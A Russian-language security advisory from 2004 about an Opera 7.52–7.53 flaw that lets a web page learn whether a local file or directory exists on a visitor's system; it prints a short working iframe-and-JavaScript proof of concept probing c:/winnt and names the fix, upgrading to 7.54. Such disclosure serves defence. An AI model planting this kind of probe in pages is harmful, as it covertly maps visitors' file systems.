Раскрытие существования файла и каталога в Opera браузере
| Дата публикации: | 18.08.2004 |
| Всего просмотров: | 1591 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Opera 7.52 и 7.53
Описание: Уязвимость в Opera позволяет удаленному пользователю создать HTML код, который, когда будет загружен целевым пользователем, определить существование определенного файла или директории на целевой системе пользователя. Когда несуществующий файл или каталог сопоставляется к iframe, браузер отображает ошибку. Удаленный пользователь может создать HMTL код, который загружает iframe и изменяет iframe URL к локальному файлу или каталогу и затем определяет их существование по сообщению об ошибке. Пример/Эксплоит:
<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>
URL производителя: http://www.opera.com/ Решение:Установите последнюю версию браузера (7.54): http://www.opera.com/download/ |
|
| Ссылки: | [Full-Disclosure] Opera Local File/Directory Detection (GM#009-OP) |